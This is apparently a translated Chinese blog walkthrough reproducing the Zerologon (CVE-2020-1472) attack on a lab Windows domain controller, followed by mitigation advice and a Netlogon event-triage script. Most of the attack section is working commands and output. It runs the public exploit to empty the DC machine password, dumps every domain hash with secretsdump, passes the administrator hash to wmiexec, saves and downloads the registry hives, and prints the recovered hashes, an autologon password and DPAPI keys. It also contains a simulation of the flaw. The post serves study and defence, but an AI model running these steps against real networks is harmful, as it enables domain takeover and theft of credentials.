Reproducing the Most Severe Microsoft Vulnerability of the Past Decade

cht 2023-06-08

[Figure 1]

This article is written solely for information-security study and exchange. Any direct or indirect consequences or losses caused by spreading or using the information it provides are the responsibility of the user.

德慎思信息安全 Podcast, Episode 1


01

Related Coverage

Microsoft patches the critical Zerologon vulnerability: privilege escalation to domain administrator allows takeover of enterprise networks

3 seconds to compromise a Windows server: Microsoft urges customers to patch Zerologon as soon as possible

US Department of Homeland Security issues a rare emergency warning: Windows has a "critical" vulnerability

One of the most severe Windows vulnerabilities of the year: hackers exploit Zerologon to plant server backdoors

Microsoft says Iranian hackers are exploiting Zerologon, the most damaging vulnerability of the year


02

Vulnerability Overview

In short, an unauthenticated attacker can bypass Netlogon authentication almost unconditionally and end up with domain controller privileges. The root cause is in the Netlogon Remote Protocol (MS-NRPC): ComputeNetlogonCredential encrypts the 8-byte client challenge with AES-CFB8 using a fixed all-zero IV, so for about 1 in 256 session keys an all-zero challenge encrypts to an all-zero credential. Because every NetrServerReqChallenge returns a fresh server challenge (and therefore a fresh session key) and machine accounts are not locked out, an attacker who sends an all-zero challenge and an all-zero credential and simply retries authenticates as the DC's own machine account after about 256 attempts on average. With that session the attacker calls NetrServerPasswordSet2 to set the machine account password to empty, and from there replicates every password hash in the domain (DCSync).


03

Affected Versions

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)


04

Timeline

Secura / Tom Tervoort reports CVE-2020-1472 to Microsoft

2020-08-11 Microsoft releases the security update

2020-09-18 The US Department of Homeland Security (CISA Emergency Directive 20-04) orders federal civilian agencies to patch by 24:00 on September 21

2020-09-24 The Microsoft Threat Intelligence Center (MSTIC) observes active exploitation of the vulnerability


05

Attack Reproduction

[Figure 2: attacker machine]

Attacker machine

[Figure 3: target machine]

Target machine

Tools

PoC (Secura tester) - https://github.com/SecuraBV/CVE-2020-1472

Exploit (dirkjanm) - https://github.com/dirkjanm/CVE-2020-1472

impacket - https://github.com/SecureAuthCorp/impacket.git


06

PoC Verification

The Secura tester only performs the authentication bypass and does not change the machine account password, so it is the safe way to check whether a DC is exposed. It takes the DC NetBIOS name and IP address (the script in the repository is zerologon_tester.py, not zerologon.py). A vulnerable DC prints "Success! DC can be fully compromised by a Zerologon attack."; a patched one prints "Attack failed. Target is probably patched."

$ git clone https://github.com/SecuraBV/CVE-2020-1472.git
$ cd CVE-2020-1472
CVE-2020-1472 $ pip install -r requirements.txt
CVE-2020-1472 $ python zerologon_tester.py dc08 192.168.10.100

07

Attack Process

The attacker does not need to be domain-joined; network access to the DC's Netlogon RPC interface is enough. The PoC and the exploit bind MS-NRPC over TCP through the endpoint mapper (port 135 plus a dynamic high port); the secretsdump and wmiexec steps later use SMB on port 445.

Overall flow

Clear the password of the DC machine account (dc08$ in this example; the exploit does this)

Dump the domain hashes through the DC

Get a shell with the dumped administrator hash

Restore the cleared machine account password from the hash recovered on the DC
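The exchange behind the first step of this flow, simulated end to end with both sides in one file. This is an added example written for this page, not code from the original post or from the PoC and exploit repositories it links. Assumptions: AES-128 is replaced by an HMAC-SHA256 keyed function and the NT hash by SHA-256 (MD4 is frequently disabled in OpenSSL 3) so that the script runs without third-party packages; the flaw is in the CFB8 mode with a zero IV, not in the cipher, so the all-zero-credential collapse and the 1/256 success rate are unchanged by that substitution. Class and function names are this example's own.

```python
"""Zerologon (CVE-2020-1472) handshake simulated end to end: DC side and attacker side."""
import hashlib
import hmac
import random

BLOCK = 16                     # AES block size; the bug is in the CFB8 mode, not in the cipher
ZERO8 = b"\x00" * 8
ZERO_IV = b"\x00" * BLOCK


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in for AES-128 (an assumption that keeps the example dependency-free).
    # Any keyed PRF will do: the attack only needs byte 0 of E_k(0^16) to be uniform
    # over the key, which holds for AES just the same.
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def cfb8(key: bytes, iv: bytes, data: bytes, decrypt: bool = False) -> bytes:
    # CFB8: one keystream byte per step, then the ciphertext byte is shifted into the
    # 16-byte register. With iv = 0^16 and data = 0^8 the register stays all-zero
    # whenever E_k(0^16)[0] == 0, so every output byte is 0. Probability: 1/256 per key.
    reg, out = bytearray(iv), bytearray()
    for b in data:
        o = block_encrypt(key, bytes(reg))[0] ^ b
        out.append(o)
        reg = reg[1:] + bytes([b if decrypt else o])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    # ComputeNetlogonCredential, AES variant: the IV is hard-coded to zero. This is the flaw.
    return cfb8(session_key, ZERO_IV, challenge)


def derive_session_key(pw_hash: bytes, client_chal: bytes, server_chal: bytes) -> bytes:
    # MS-NRPC AES session key: HMAC-SHA256(NT hash, client challenge || server challenge)[:16]
    return hmac.new(pw_hash, client_chal + server_chal, hashlib.sha256).digest()[:BLOCK]


def pw_hash(password: bytes) -> bytes:
    # Stand-in for the NT (MD4) hash of the machine account password.
    return hashlib.sha256(password).digest()[:BLOCK]


class NetlogonServer:
    """DC-side state for the three RPC calls the public exploit uses."""

    def __init__(self, machine_password: bytes, seed: int = 0):
        self.pw_hash = pw_hash(machine_password)
        self.rng = random.Random(seed)          # seeded so a run is reproducible
        self.key = self.client_chal = self.stored_cred = None

    def req_challenge(self, client_chal: bytes) -> bytes:
        # NetrServerReqChallenge: a fresh server challenge, hence a fresh session key,
        # hence an independent 1/256 chance on every attempt (machine accounts never lock out).
        server_chal = self.rng.getrandbits(64).to_bytes(8, "little")
        self.client_chal, self.stored_cred = client_chal, None
        self.key = derive_session_key(self.pw_hash, client_chal, server_chal)
        return server_chal

    def authenticate3(self, client_cred: bytes) -> bool:
        # NetrServerAuthenticate3: the DC recomputes the credential from the client challenge.
        # (The real exploit also clears the negotiate flag that asks for RPC signing/sealing.)
        if not hmac.compare_digest(compute_netlogon_credential(self.key, self.client_chal), client_cred):
            return False
        self.stored_cred = client_cred
        return True

    def password_set2(self, authenticator: bytes, timestamp: int, enc_pw: bytes) -> bool:
        # NetrServerPasswordSet2: authenticator = credential(key, stored_cred + timestamp);
        # new password = CFB8-decrypt(key, 0^16, 516-byte NL_TRUST_PASSWORD blob).
        if self.stored_cred is None:
            return False
        first = (int.from_bytes(self.stored_cred[:4], "little") + timestamp) & 0xFFFFFFFF
        self.stored_cred = first.to_bytes(4, "little") + self.stored_cred[4:]
        if not hmac.compare_digest(compute_netlogon_credential(self.key, self.stored_cred), authenticator):
            return False
        blob = cfb8(self.key, ZERO_IV, enc_pw, decrypt=True)
        length = int.from_bytes(blob[512:516], "little")    # byte length of the new password
        if length > 512:
            return False
        self.pw_hash = pw_hash(blob[512 - length:512])     # password sits at the end of the buffer
        return True


def zerologon_attack(server: NetlogonServer, max_attempts: int = 2000):
    # Attacker side: every field is all zeros on every try. Returns the winning attempt or None.
    for attempt in range(1, max_attempts + 1):
        server.req_challenge(ZERO8)
        if server.authenticate3(ZERO8) and server.password_set2(ZERO8, 0, b"\x00" * 516):
            return attempt
    return None


def weak_key_rate(trials: int, seed: int = 1) -> float:
    # Fraction of random session keys for which the all-zero challenge gives an all-zero credential.
    rng = random.Random(seed)
    hits = sum(compute_netlogon_credential(rng.getrandbits(128).to_bytes(16, "little"), ZERO8) == ZERO8
               for _ in range(trials))
    return hits / trials


if __name__ == "__main__":
    dc = NetlogonServer(b"Str0ng-machine-account-password!")
    print("authenticated after attempt", zerologon_attack(dc),
          "- DC machine password now empty:", dc.pw_hash == pw_hash(b""))
    print(f"weak-key rate over 20000 keys: {weak_key_rate(20000):.4f} (1/256 = {1/256:.4f})")
```

The 516-byte all-zero password blob decrypts to all zeros for the same reason the credential does, and a zero length field at the end of the buffer means "empty password"; that is the state the rest of this walkthrough then abuses and finally repairs.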

Install the latest impacket

# install impacket
$ git clone https://github.com/SecureAuthCorp/impacket.git
$ cd impacket
impacket $ python setup.py install
$ pip list


[Figure 4: pip list]

pip list

Download the exploit and start the attack (the DC NetBIOS name is dc08, as the hostname output below confirms)

$ git clone https://github.com/dirkjanm/CVE-2020-1472.git
$ cd CVE-2020-1472
CVE-2020-1472 $ python cve-2020-1472-exploit.py dc08 192.168.10.100


[Figure 5]

This sets the DC machine account password in Active Directory to empty. Caution: the DC's own locally stored copy of that password (the LSA secret dumped later) is not changed, so until it is restored the DC can no longer authenticate to the rest of the domain and replication, DNS updates and other DC-to-DC traffic break. Only run this against a lab DC you can restore, and keep the original hash.


08

Exploitation


Dump the domain hashes through the DC

Use impacket's secretsdump.py to dump the hashes held by the domain controller. It authenticates as the DC machine account with the now-empty password (-no-pass) and pulls the NTDS secrets through the DRSUAPI replication interface (DCSync), which yields every domain hash including the Administrator and krbtgt accounts.

~impacket/examples/
# windows
python secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass
# others (escape the $ in a POSIX shell)
python secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

Hands-on

python secretsdump.py red.com/dc08$@192.168.10.100 -just-dc -no-pass


[Figure 6]

Get a shell

Use the administrator hash obtained in the previous step to get a shell (pass-the-hash; the first half of the -hashes value is the empty LM placeholder), then connect to the DC and dump the hives that hold its original machine account password.

~impacket/examples/
python wmiexec.py -hashes <LMHASH:NTHASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR

Hands-on

C:\Users\admin\Desktop\code\impacket\examples (master -> origin)
λ python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942 red.com/administrator@192.168.10.100


[Figure 7]

Dump the SAM, SECURITY and SYSTEM hives from the DC

The garbled characters in the original capture are the DC's code page 936 (GBK) console output decoded with the wrong codec; they are rendered in English below. Rerunning wmiexec.py with -codec gbk avoids the decoding warnings. Note the typo in the last del command ("security save" instead of "security.save"): security.save was left behind on the DC and still needs to be cleaned up.

C:\Users\admin\Desktop\code\impacket\examples (master -> origin)
λ python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942 red.com/administrator@192.168.10.100
Impacket v0.9.22.dev1+20201015.130615.81eec85a - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
dc08

C:\>reg save HKLM\SYSTEM system.save
[-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec
The operation completed successfully.

C:\>reg save HKLM\SAM sam.save
[-] Decoding error detected (same warning as above)
The operation completed successfully.

C:\>reg save HKLM\SECURITY security.save
[-] Decoding error detected (same warning as above)
The operation completed successfully.

C:\>dir
[-] Decoding error detected (same warning as above)
 Volume in drive C has no label.
 Volume Serial Number is 826F-C49C

 Directory of C:\

2020/09/17  10:40             2,292 AiOLog.txt
2009/07/14  11:20    <DIR>          PerfLogs
2020/10/27  19:04    <DIR>          Program Files
2020/10/27  19:04    <DIR>          Program Files (x86)
2020/10/27  20:18            28,672 sam.save
2020/10/27  20:18            32,768 security.save
2020/10/27  20:14        11,182,080 system.save
2020/09/17  14:41    <DIR>          tools
2020/09/17  09:39    <DIR>          Users
2020/10/27  20:18    <DIR>          Windows
               4 File(s)     11,245,812 bytes
               6 Dir(s)  28,854,845,440 bytes free

C:\>get system.save
[*] Downloading C:\\system.save
C:\>get sam.save
[*] Downloading C:\\sam.save
C:\>get security.save
[*] Downloading C:\\security.save
C:\>del /f system.save
C:\>del /f sam.save
C:\>del /f security save
[-] Decoding error detected (same warning as above)
Could Not Find C:\security
C:\>exit
C:\Users\admin\Desktop\code\impacket\examples (master -> origin)

Parse the hashes

Run secretsdump.py in LOCAL mode against the downloaded hives. The value needed for the restore is not in the SAM at all: it is the LSA secret $MACHINE.ACC from the SECURITY hive (decrypted with the boot key from SYSTEM), which is the DC's own stored copy of its machine account password and therefore the pre-exploit value. The DefaultPassword secret (an autologon password, ROOT#123 here) is also exposed in the clear and is a finding in its own right.

C:\Users\admin\Desktop\code\impacket\examples (master -> origin)
λ python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.22.dev1+20201015.130615.81eec85a - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x83c0d28e2de4a1dabdd85173f9f51ab4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:6d554f8bbb8dfab162d62d60764cd51a89362f928231339ec0152aeb8ac024fa5ca5963ad5d910cf46d182e2ec5b747b9e9622f15f136a24e6572f1aae05124b70ab32b3bb5852be3c434ef32ce09d60bf7f535c14490b936e37517dc60c9a653976e0974b3a6f8ecf0a20cecdc83b9bcfac959786b52bae8497c57dd4ce963d737c3af6007b461b42a3895d1676b7c3a2fcfc502214b9af3bfb11f858082f48b07b216c8b39c411dd932b3c0ea82ad73b05f3dee965fd42fd63d1cdb0458e57cb809fed6f76cd0682da9d63171398cffd74417412b437c4f25086fa0e602fac2e31d5019d9bbd51b94a63eaa5ad4dd1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:84e8c3ee5d3d725a00d3195cbd79c922
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x513a838fa7c8300a25ca527b6146ec3955df748c
dpapi_userkey:0x6616819fd9a4db354fda5b0e286f3ec37888d343
[*] NL$KM
 0000   97 DA 18 77 A4 98 1F 49  5A 6B 07 24 06 4A 2D 86   ...w...IZk.$.J-.
 0010   67 C2 F0 32 6F 49 74 41  93 E9 23 0F FC AE A0 11   g..2oItA..#.....
 0020   E5 FF 99 E9 1D 1D F7 82  52 21 91 58 16 7A 8E FF   ........R!.X.z..
 0030   8F 27 0E AF 2B 98 FE D7  28 6C 72 D1 58 9D 4C 46   .'..+...(lr.X.LF
NL$KM:97da1877a4981f495a6b0724064a2d8667c2f0326f49744193e9230ffcaea011e5ff99e91d1df78252219158167a8eff8f270eaf2b98fed7286c72d1589d4c46
[*] Cleaning up...
C:\Users\admin\Desktop\code\impacket\examples (master -> origin)

Record the original machine account hash (the highlighted part of the figure)


[Figure 8]

# ORI_HASH 84e8c3ee5d3d725a00d3195cbd79c922

Restore the original hash

The risksense script authenticates to the DC with the now-empty machine account password and then calls NetrServerPasswordSet (as the NetrServerPasswordSetResponse in the output shows), which takes the NT hash of the new password rather than a cleartext password, so the original NT hash recovered from the LSA secret is sufficient. The NegotiateFlags value 556793855 in the response is 0x212fffff, the flag set used by the public exploit.

# ~impacket/examples/zerologon
git clone https://github.com/risksense/zerologon
cd zerologon
python reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

Hands-on

C:\Users\admin\Desktop\code\impacket\examples\zerologon (master -> origin)
λ python reinstall_original_pw.py dc08 192.168.10.100 84e8c3ee5d3d725a00d3195cbd79c922
Performing authentication attempts...
===============
NetrServerAuthenticate3Response
ServerCredential:
    Data: b'us#\xdb(\xb3\xbcp'
NegotiateFlags: 556793855
AccountRid: 1000
ErrorCode: 0

server challenge b'uA\x02\xe9\x0e\x90\x1d('
session key b'\x92\xd3(\xae)a\xb7\x99\xb3N\xc7\xa3g\xbf(F'
NetrServerPasswordSetResponse
ReturnAuthenticator:
    Credential:
        Data: b'\x01\r@\xe2\xcd\xb5z\x8d'
    Timestamp: 0
ErrorCode: 0

Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.
C:\Users\admin\Desktop\code\impacket\examples\zerologon (master -> origin)

Check that the restore succeeded

Dump the hashes again with the empty machine account password. If the restore worked, this attempt must now fail with a logon failure, because the machine account no longer has an empty password; the -no-pass dump that succeeded earlier is exactly the condition being undone. To compare the values instead, dump again with the administrator hash (-hashes) and check that the DC08$ entry shows the original NT hash 84e8c3ee5d3d725a00d3195cbd79c922 rather than the empty-password hash 31d6cfe0d16ae931b73c59d7e0c089c0.

# ~/impacket/examples
# windows
python secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass
# others (escape the $ in a POSIX shell)
python secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

Verify

python secretsdump.py red.com/dc08$@192.168.10.100 -just-dc -no-pass


09

Mitigation

Install the security updates released on 2020-08-11 on every domain controller. That update starts the deployment phase, which already rejects vulnerable Netlogon connections from Windows devices; the enforcement phase, which also rejects non-compliant third-party devices, began with the 2021-02-09 updates and can be switched on earlier by setting the DWORD value FullSecureChannelProtection to 1 under HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters.

Monitor the System event log on the DCs for the Netlogon events introduced by the update: 5827 and 5828 (vulnerable connection from a machine or trust account denied), 5829 (vulnerable connection allowed during the deployment phase, meaning the device still needs fixing before enforcement) and 5830 / 5831 (vulnerable connection allowed because the device is exempted by the "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy).
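A small triage of those Netlogon events, run over an event XML export as produced by wevtutil or Get-WinEvent. This is an added example written for this page, not code from the original post or from Microsoft. The provider name, channel and event IDs are the documented ones; the sample export itself is constructed, and the EventData field name "SamAccountName" and the host names in it are assumptions for this example. The function also filters on the provider, because other sources reuse event numbers.

```python
"""Triage Netlogon vulnerable-connection events (5827-5831) from a Windows event XML export."""
import xml.etree.ElementTree as ET
from collections import Counter

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVT_NS}

# Event IDs introduced by the August 2020 updates and what each one means.
NETLOGON_EVENTS = {
    5827: "denied",              # vulnerable connection from a machine account refused
    5828: "denied",              # vulnerable connection from a trust account refused
    5829: "allowed-vulnerable",  # deployment phase only: still allowed, denied once enforcement is on
    5830: "allowed-by-policy",   # machine account exempted by group policy
    5831: "allowed-by-policy",   # trust account exempted by group policy
}

# Constructed sample export (not a real capture). Field name "SamAccountName" is an assumption.
SAMPLE_XML = f"""<Events>
<Event xmlns="{EVT_NS}"><System><Provider Name="NETLOGON"/><EventID>5829</EventID>
<Channel>System</Channel><TimeCreated SystemTime="2020-10-27T11:02:10Z"/><Computer>dc08.red.com</Computer></System>
<EventData><Data Name="SamAccountName">NAS01$</Data><Data Name="Domain">red.com</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><Provider Name="NETLOGON"/><EventID>5827</EventID>
<Channel>System</Channel><TimeCreated SystemTime="2020-10-27T11:05:44Z"/><Computer>dc08.red.com</Computer></System>
<EventData><Data Name="SamAccountName">OLDPRN$</Data><Data Name="Domain">red.com</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><Provider Name="NETLOGON"/><EventID>5830</EventID>
<Channel>System</Channel><TimeCreated SystemTime="2020-10-27T11:30:00Z"/><Computer>dc08.red.com</Computer></System>
<EventData><Data Name="SamAccountName">LEGACY01$</Data><Data Name="Domain">red.com</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><Provider Name="NETLOGON"/><EventID>5829</EventID>
<Channel>System</Channel><TimeCreated SystemTime="2020-10-27T12:18:01Z"/><Computer>dc08.red.com</Computer></System>
<EventData><Data Name="SamAccountName">NAS01$</Data><Data Name="Domain">red.com</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
<Channel>Security</Channel><TimeCreated SystemTime="2020-10-27T12:20:00Z"/><Computer>dc08.red.com</Computer></System>
<EventData><Data Name="TargetUserName">administrator</Data></EventData></Event>
</Events>"""


def triage(xml_text: str):
    """Return (Counter of outcomes, {account: (last_seen, outcome)}) for Netlogon events 5827-5831.

    Every account listed needs attention: "allowed-*" devices will break at enforcement,
    and a "denied" entry is either an unpatched device or an attacker being refused."""
    summary = Counter()
    accounts = {}
    for ev in ET.fromstring(xml_text).iter(f"{{{EVT_NS}}}Event"):
        sysnode = ev.find("e:System", NS)
        provider = sysnode.find("e:Provider", NS).get("Name", "")
        event_id = int(sysnode.findtext("e:EventID", default="0", namespaces=NS))
        if provider.upper() != "NETLOGON" or event_id not in NETLOGON_EVENTS:
            continue
        outcome = NETLOGON_EVENTS[event_id]
        summary[outcome] += 1
        account = ev.findtext("e:EventData/e:Data[@Name='SamAccountName']", default="?", namespaces=NS)
        when = sysnode.find("e:TimeCreated", NS).get("SystemTime", "")
        prev = accounts.get(account)
        if prev is None or when > prev[0]:          # keep the most recent observation per account
            accounts[account] = (when, outcome)
    return summary, accounts


if __name__ == "__main__":
    counts, todo = triage(SAMPLE_XML)
    print(dict(counts))
    for acct, (last, outcome) in sorted(todo.items()):
        print(f"{acct}: {outcome}, last seen {last}")
```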


10

References

Microsoft Security Response Center advisory for CVE-2020-1472 - https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-1472

CVE-2020-1472 reproduction guide (Tencent Cloud developer article) - https://cloud.tencent.com/developer/article/1700109

impacket - https://github.com/SecureAuthCorp/impacket/

risksense/zerologon - https://github.com/risksense/zerologon

potatsoSec write-up on cnblogs - https://www.cnblogs.com/potatsoSec/p/13710947.html

Reprinted from the Toutiao account 德慎思信息安全 (will be removed on request).


Tags: past decade  Microsoft  severe  vulnerability  reproduction